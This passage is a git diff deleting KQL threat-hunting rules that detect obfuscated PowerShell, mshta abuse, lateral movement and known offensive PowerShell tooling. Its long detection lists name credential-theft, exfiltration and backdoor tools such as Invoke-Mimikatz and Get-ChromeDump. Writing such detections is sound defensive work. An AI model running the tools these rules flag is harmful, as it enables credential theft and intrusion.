--- a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
deleted file mode 100644
index e1957d0c..00000000
--- a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql b/Execution/Invoke-Obfuscation_VAR+_Launcher.kql
deleted file mode 100644
index c5c03061..00000000
--- a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Stdin.kql b/Execution/Invoke-Obfuscation_Via_Stdin.kql
deleted file mode 100644
index c7d99e0d..00000000
--- a/Execution/Invoke-Obfuscation_Via_Stdin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql b/Execution/Invoke-Obfuscation_Via_Use_Clip.kql
deleted file mode 100644
index b66ecade..00000000
--- a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql
deleted file mode 100644
index 7041f5ee..00000000
--- a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/Execution/Java_Running_with_Remote_Debugging.kql b/Execution/Java_Running_with_Remote_Debugging.kql
deleted file mode 100644
index f9e528bc..00000000
--- a/Execution/Java_Running_with_Remote_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
-// Tags: attack.t1203, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/Execution/Local_File_Read_Using_Curl.EXE.kql b/Execution/Local_File_Read_Using_Curl.EXE.kql
deleted file mode 100644
index f838af05..00000000
--- a/Execution/Local_File_Read_Using_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql b/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql
deleted file mode 100644
index 5749cb76..00000000
--- a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/06
-// Level: medium
-// Description: Detects password change for the logged-on user's via "ksetup.exe"
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/Execution/MMC20_Lateral_Movement.kql b/Execution/MMC20_Lateral_Movement.kql
deleted file mode 100644
index 4c7b0b92..00000000
--- a/Execution/MMC20_Lateral_Movement.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
-// Date: 2020/03/04
-// Level: high
-// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
-// Tags: attack.execution, attack.t1021.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Execution/MSHTA_Suspicious_Execution_01.kql b/Execution/MSHTA_Suspicious_Execution_01.kql
deleted file mode 100644
index 280ba986..00000000
--- a/Execution/MSHTA_Suspicious_Execution_01.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-// Date: 2019/02/22
-// Level: high
-// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599
-DeviceProcessEvents
-| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql b/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql
deleted file mode 100644
index 9385195f..00000000
--- a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: John Lambert (rule)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine
contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
deleted file mode 100644
index dd255075..00000000
--- a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: high -// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks -// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" 
or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or 
ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or 
ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or 
ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or 
ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql b/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql deleted file mode 100644 index 248f9cd5..00000000 --- a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein -// Date: 2018/04/07 -// Level: high -// Description: Detects the creation of known offensive powershell scripts used for exploitation -// Tags: attack.execution, attack.t1059.001 -DeviceFileEvents -| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith 
"\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith 
"\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith 
